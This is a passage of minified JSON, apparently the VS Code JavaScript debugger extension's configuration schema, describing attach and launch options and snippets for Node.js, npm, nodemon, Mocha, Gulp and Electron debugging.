configuration](command:extension.js-debug.createDiagnostics)."},"type":"pwa-node","variables":{"PickProcess":"extension.js-debug.pickNodeProcess"}},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"attach":{"properties":{"address":{"default":"localhost","description":"TCP/IP address of process to be debugged. Default is 'localhost'.","type":"string"},"attachExistingChildren":{"default":false,"description":"Whether to attempt to attach to already-spawned child processes.","type":"boolean"},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"continueOnAttach":{"default":true,"markdownDescription":"If true, we'll automatically resume programs launched and waiting on `--inspect-brk`","type":"boolean"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"port":{"default":9229,"description":"Debug port to attach to. Default is 9229.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"processId":{"default":"${command:PickProcess}","description":"ID of process to attach to.","type":"string"},"remoteHostHeader":{"description":"Explicit Host header to use when connecting to the websocket of inspector. If unspecified, the host header will be set to 'localhost'. This is useful when the inspector is running behind a proxy that only accept particular Host header.","type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"websocketAddress":{"description":"Exact websocket address to attach to. If unspecified, it will be discovered from the address and port.","type":"string"}}},"launch":{"properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}}}},"configurationSnippets":[{"body":{"name":"${1:Attach}","port":9229,"request":"attach","skipFiles":["/**"],"type":"node"},"description":"Attach to a running node program","label":"Node.js: Attach"},{"body":{"address":"${2:TCP/IP address of process to be debugged}","localRoot":"^\"\\${workspaceFolder}\"","name":"${1:Attach to Remote}","port":9229,"remoteRoot":"${3:Absolute path to the remote directory containing the program}","request":"attach","skipFiles":["/**"],"type":"node"},"description":"Attach to the debug port of a remote node program","label":"Node.js: Attach to Remote Program"},{"body":{"name":"${1:Attach by Process ID}","processId":"^\"\\${command:PickProcess}\"","request":"attach","skipFiles":["/**"],"type":"node"},"description":"Open process picker to select node process to attach to","label":"Node.js: Attach to Process"},{"body":{"name":"${2:Launch Program}","program":"^\"\\${workspaceFolder}/${1:app.js}\"","request":"launch","skipFiles":["/**"],"type":"node"},"description":"Launch a node program in debug mode","label":"Node.js: Launch Program"},{"body":{"name":"${1:Launch via NPM}","request":"launch","runtimeArgs":["run-script","debug"],"runtimeExecutable":"npm","skipFiles":["/**"],"type":"node"},"label":"Node.js: Launch via npm","markdownDescription":"Launch a node program through an npm `debug` script"},{"body":{"console":"integratedTerminal","internalConsoleOptions":"neverOpen","name":"nodemon","program":"^\"\\${workspaceFolder}/${1:app.js}\"","request":"launch","restart":true,"runtimeExecutable":"nodemon","skipFiles":["/**"],"type":"node"},"description":"Use nodemon to relaunch a debug session on source changes","label":"Node.js: Nodemon Setup"},{"body":{"args":["-u","tdd","--timeout","999999","--colors","^\"\\${workspaceFolder}/${1:test}\""],"internalConsoleOptions":"openOnSessionStart","name":"Mocha Tests","program":"^\"mocha\"","request":"launch","skipFiles":["/**"],"type":"node"},"description":"Debug mocha tests","label":"Node.js: Mocha Tests"},{"body":{"args":["${1:generator}"],"console":"integratedTerminal","internalConsoleOptions":"neverOpen","name":"Yeoman ${1:generator}","program":"^\"\\${workspaceFolder}/node_modules/yo/lib/cli.js\"","request":"launch","skipFiles":["/**"],"type":"node"},"label":"Node.js: Yeoman generator","markdownDescription":"Debug yeoman generator (install by running `npm link` in project folder)"},{"body":{"args":["${1:task}"],"name":"Gulp ${1:task}","program":"^\"\\${workspaceFolder}/node_modules/gulp/bin/gulp.js\"","request":"launch","skipFiles":["/**"],"type":"node"},"description":"Debug gulp task (make sure to have a local gulp installed in your project)","label":"Node.js: Gulp task"},{"body":{"name":"Electron Main","program":"^\"\\${workspaceFolder}/main.js\"","request":"launch","runtimeExecutable":"^\"electron\"","skipFiles":["/**"],"type":"node"},"description":"Debug the Electron main process","label":"Node.js: Electron Main"}],"label":"Node.js","strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"node","variables":{"PickProcess":"extension.js-debug.pickNodeProcess"}},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"launch":{"properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}}}},"configurationSnippets":[{"body":{"command":"npm start","name":"Run npm start","request":"launch","type":"node-terminal"},"description":"Run \"npm start\" in a debug terminal","label":"Run \"npm start\" in a debug terminal"}],"label":"JavaScript Debug Terminal","languages":[],"strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"node-terminal"},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"launch":{"properties":{"args":{"default":["--extensionDevelopmentPath=${workspaceFolder}"],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":"array"},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"debugWebWorkerHost":{"default":true,"markdownDescription":"Configures whether we should try to attach to the web worker extension host.","type":["boolean"]},"debugWebviews":{"default":true,"markdownDescription":"Configures whether we should try to attach to webviews in the launched VS Code instance. This will only work in desktop VS Code.","type":["boolean"]},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"rendererDebugOptions":{"default":{"webRoot":"${workspaceFolder}"},"markdownDescription":"Chrome launch options used when attaching to the renderer process, with `debugWebviews` or `debugWebWorkerHost`.","properties":{"address":{"default":"localhost","description":"IP address or hostname the debugged browser is listening on.","type":"string"},"browserAttachLocation":{"default":null,"description":"Forces the browser to attach in one location. In a remote workspace (through ssh or WSL, for example) this can be used to attach to a browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string 